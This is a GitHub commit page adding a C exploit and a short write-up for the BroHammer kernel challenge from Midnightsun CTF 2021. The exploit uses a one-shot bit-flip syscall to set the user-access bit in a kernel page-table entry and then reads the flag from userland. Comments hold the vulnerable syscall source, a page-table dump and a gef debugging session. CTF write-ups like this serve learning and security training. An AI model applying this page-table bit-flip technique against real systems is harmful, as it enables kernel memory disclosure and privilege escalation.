Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Commit 54e4572

Browse files
Solved BroHammer from Midnightsun CTF 2021
Mini writeup below the exploit
1 parent fe817ea commit 54e4572

File tree

1 file changed

+143
-0
lines changed

1 file changed

+143
-0
lines changed

‎midnightsun2021_brohammer_exploit.c‎

Lines changed: 143 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,143 @@
1+
#include <stdio.h>
2+
#include <stdlib.h>
3+
#include <unistd.h>
4+
5+
#ifndef __NR_BROHAMMER
6+
#define __NR_BROHAMMER 333
7+
#endif
8+
9+
void brohammer(unsigned long addr, int bit){
10+
return syscall(__NR_BROHAMMER, addr, bit);
11+
}
12+
13+
int main(){
14+
brohammer(0xffff8800018fb138, 2);
15+
unsigned char* flag = (unsigned char*)0xffff880004e19000ULL;
16+
for (unsigned char *j = flag; j < flag + 0x100 && *j; ++j) {
17+
printf("%c", *j);
18+
}
19+
}
20+
21+
22+
/*
23+
#!/bin/bash
24+
qemu-system-x86_64 \
25+
-m 128M \
26+
-kernel ./kernel \
27+
-initrd ./initrd \
28+
-nographic \
29+
-monitor /dev/null \
30+
-append "nokaslr root=/dev/ram rw console=ttyS0 oops=panic paneic=1 quiet" 2>/dev/null
31+
32+
NO KASLR, SMEP, SMAP, KPTI
33+
*/
34+
35+
/*
36+
#include <linux/kernel.h>
37+
#include <linux/init.h>
38+
#include <linux/sched.h>
39+
#include <linux/syscalls.h>
40+
41+
#ifndef __NR_BROHAMMER
42+
#define __NR_BROHAMMER 333
43+
#endif
44+
45+
unsigned long flips = 0;
46+
47+
SYSCALL_DEFINE2(brohammer, long *, addr, long, bit) // define a new syscall with number 333 that flip a specified bit on a specified address
48+
{
49+
if (flips >= 1)
50+
{
51+
printk(KERN_INFO "brohammer: nope\n");
52+
return -EPERM;
53+
}
54+
55+
*addr ^= (1ULL << (bit));
56+
(*(long *) &flips)++;
57+
58+
return 0;
59+
}
60+
*/
61+
62+
63+
/*
64+
0xffff880000000000-0xffff880000099000 0x0000000000000000-0x0000000000099000 0x99000 0x1000 153 [RW- KERN ACCESSED DIRTY GLOBAL]
65+
0xffff880000099000-0xffff88000009a000 0x0000000000099000-0x000000000009a000 0x1000 0x1000 1 [R-- KERN ACCESSED DIRTY GLOBAL]
66+
0xffff88000009a000-0xffff88000009b000 0x000000000009a000-0x000000000009b000 0x1000 0x1000 1 [R-X KERN ACCESSED DIRTY GLOBAL]
67+
0xffff88000009b000-0xffff880000200000 0x000000000009b000-0x0000000000200000 0x165000 0x1000 357 [RW- KERN ACCESSED DIRTY GLOBAL]
68+
0xffff880000200000-0xffff880001000000 0x0000000000200000-0x0000000001000000 0xe00000 0x200000 7 [RW- KERN ACCESSED DIRTY GLOBAL]
69+
0xffff880001000000-0xffff880001400000 0x0000000001000000-0x0000000001400000 0x400000 0x200000 2 [R-- KERN ACCESSED DIRTY GLOBAL]
70+
0xffff880001400000-0xffff880001404000 0x0000000001400000-0x0000000001404000 0x4000 0x1000 4 [R-- KERN ACCESSED DIRTY GLOBAL]
71+
0xffff880001404000-0xffff880001600000 0x0000000001404000-0x0000000001600000 0x1fc000 0x1000 508 [RW- KERN ACCESSED DIRTY GLOBAL]
72+
0xffff880001600000-0xffff880001671000 0x0000000001600000-0x0000000001671000 0x71000 0x1000 113 [R-- KERN ACCESSED DIRTY GLOBAL]
73+
0xffff880001671000-0xffff880001800000 0x0000000001671000-0x0000000001800000 0x18f000 0x1000 399 [RW- KERN ACCESSED DIRTY GLOBAL]
74+
0xffff880001800000-0xffff880007e00000 0x0000000001800000-0x0000000007e00000 0x6600000 0x200000 51 [RW- KERN ACCESSED DIRTY GLOBAL]
75+
0xffff880007e00000-0xffff880007fe0000 0x0000000007e00000-0x0000000007fe0000 0x1e0000 0x1000 480 [RW- KERN ACCESSED DIRTY GLOBAL]
76+
0xffffc90000000000-0xffffc90000004000 0x0000000000086000-0x000000000008a000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
77+
0xffffc90000008000-0xffffc9000000c000 0x0000000000010000-0x0000000000014000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
78+
0xffffc90000010000-0xffffc90000014000 0x0000000000016000-0x000000000001a000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
79+
0xffffc90000018000-0xffffc9000001c000 0x000000000001c000-0x0000000000020000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
80+
0xffffc90000020000-0xffffc90000024000 0x0000000000023000-0x0000000000027000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
81+
0xffffc90000028000-0xffffc9000002c000 0x000000000002a000-0x000000000002e000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
82+
0xffffc90000030000-0xffffc90000034000 0x0000000000030000-0x0000000000034000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
83+
0xffffc90000038000-0xffffc9000003c000 0x0000000000036000-0x000000000003a000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
84+
0xffffc90000040000-0xffffc90000044000 0x0000000000058000-0x000000000005c000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
85+
0xffffc90000048000-0xffffc9000004c000 0x000000000005d000-0x0000000000061000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
86+
0xffffc90000050000-0xffffc90000054000 0x000000000019b000-0x000000000019f000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
87+
0xffffc90000058000-0xffffc9000005c000 0x000000000358d000-0x0000000003591000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
88+
0xffffc90000060000-0xffffc90000064000 0x00000000035cb000-0x00000000035cf000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
89+
0xffffc90000065000-0xffffc90000068000 0x00000000023c8000-0x00000000023cb000 0x3000 0x1000 3 [RW- KERN ACCESSED DIRTY GLOBAL]
90+
0xffffc9000006c000-0xffffc90000070000 0x00000000023db000-0x00000000023df000 0x4000 0x1000 4 [RW- KERN ACCESSED DIRTY GLOBAL]
91+
0xffffc90000074000-0xffffc90000075000 0x00000000023ec000-0x00000000023ed000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
92+
0xffffc90000075000-0xffffc90000076000 0x000000000772b000-0x000000000772c000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
93+
0xffffc90000076000-0xffffc90000077000 0x000000000772e000-0x000000000772f000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
94+
0xffffc90000077000-0xffffc90000078000 0x0000000007718000-0x0000000007719000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
95+
0xffffea0000000000-0xffffea0000200000 0x0000000006000000-0x0000000006200000 0x200000 0x200000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
96+
0xfffffe0000000000-0xfffffe0000001000 0x00000000018c3000-0x00000000018c4000 0x1000 0x1000 1 [R-- KERN ACCESSED DIRTY GLOBAL]
97+
0xfffffe0000001000-0xfffffe0000002000 0x0000000001809000-0x000000000180a000 0x1000 0x1000 1 [R-- KERN ACCESSED DIRTY GLOBAL]
98+
0xfffffe0000002000-0xfffffe0000003000 0x000000000180f000-0x0000000001810000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
99+
0xfffffe0000003000-0xfffffe0000006000 0x0000000001806000-0x0000000001809000 0x3000 0x1000 3 [R-- KERN ACCESSED DIRTY GLOBAL]
100+
0xfffffe0000006000-0xfffffe0000007000 0x0000000001401000-0x0000000001402000 0x1000 0x1000 1 [R-X KERN ACCESSED DIRTY GLOBAL]
101+
0xfffffe0000007000-0xfffffe000000c000 0x000000000180a000-0x000000000180f000 0x5000 0x1000 5 [RW- KERN ACCESSED DIRTY GLOBAL]
102+
0xffffffff81000000-0xffffffff81400000 0x0000000001000000-0x0000000001400000 0x400000 0x200000 2 [R-X KERN ACCESSED DIRTY GLOBAL]
103+
0xffffffff81400000-0xffffffff81404000 0x0000000001400000-0x0000000001404000 0x4000 0x1000 4 [R-X KERN ACCESSED DIRTY GLOBAL]
104+
0xffffffff81404000-0xffffffff81600000 0x0000000001404000-0x0000000001600000 0x1fc000 0x1000 508 [RW- KERN ACCESSED DIRTY GLOBAL]
105+
0xffffffff81600000-0xffffffff81800000 0x0000000001600000-0x0000000001800000 0x200000 0x200000 1 [R-- KERN ACCESSED DIRTY GLOBAL]
106+
0xffffffff81800000-0xffffffff81a00000 0x0000000001800000-0x0000000001a00000 0x200000 0x1000 512 [RW- KERN ACCESSED DIRTY GLOBAL]
107+
0xffffffffff5fc000-0xffffffffff5fd000 0x00000000fec00000-0x00000000fec01000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
108+
0xffffffffff5fd000-0xffffffffff5fe000 0x00000000fee00000-0x00000000fee01000 0x1000 0x1000 1 [RW- KERN ACCESSED DIRTY GLOBAL]
109+
0xffffffffff600000-0xffffffffff601000 0x0000000001804000-0x0000000001805000 0x1000 0x1000 1 [R-- USER ACCESSED DIRTY GLOBAL]
110+
111+
gef> search-pattern "this is where the flag will be on the remote host"
112+
[+] Searching 'this is where the flag will be on the remote host' in whole memory
113+
[+] In (0xffff880001800000-0xffff880007e00000 [rw-])
114+
0xffff880004e19000: 74 68 69 73 20 69 73 20 77 68 65 72 65 20 74 68 | this is where th |
115+
[+] Searching 't\x00h\x00i\x00s\x00 \x00i\x00s\x00 \x00w\x00h\x00e\x00r\x00e\x00 \x00t\x00h\x00e\x00 \x00f\x00l\x00a\x00g\x00 \x00w\x00i\x00l\x00l\x00 \x00b\x00e\x00 \x00o\x00n\x00 \x00t\x00h\x00e\x00 \x00r\x00e\x00m\x00o\x00t\x00e\x00 \x00h\x00o\x00s\x00t\x00' in whole memory
116+
gef> x/s 0xffff880004e19000
117+
0xffff880004e19000: "this is where the flag will be on the remote host...\n"
118+
gef> xinfo 0xffff880004e19000
119+
---------------------------------------------------------------------------------------- xinfo: 0xffff880004e19000 ----------------------------------------------------------------------------------------
120+
Virtual address start-end Physical address start-end Total size Page size Count Flags
121+
0xffff880001800000-0xffff880007e00000 0x0000000001800000-0x0000000007e00000 0x6600000 0x200000 51 [RW- KERN ACCESSED DIRTY GLOBAL]
122+
Offset (from virt mapped): 0xffff880001800000 + 0x3619000
123+
Offset (from phys mapped): 0x1800000 + 0x3619000
124+
125+
Physical address : 0x4e19000
126+
Physical map pages size : 2 MiB
127+
128+
0x4e19000 % 2**21 => 0x1900 => Address of 2MiB aligned page starts at 0x4e00000
129+
130+
Thanks to 'xinfo' I started checking the physical address start until I find 0x4e00000 using the command 'xp'
131+
xp -- Dump physical memory via qemu-monitor. (gef)
132+
133+
After manually inspecting all address from 0x1800000 I reached:
134+
gef> xp 0x18fb138
135+
00000000018fb138: 0x8000000004e001e3
136+
137+
So we need to flip 0xffff8800018fb138, but which bit??? StackOverflow gave me an answer:
138+
https://stackoverflow.com/questions/59948388/how-to-properly-set-privileges-in-page-directory-entries
139+
140+
So if we flip the 2° bit we can read the content of those mapping also from userland...
141+
*/
142+
143+

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /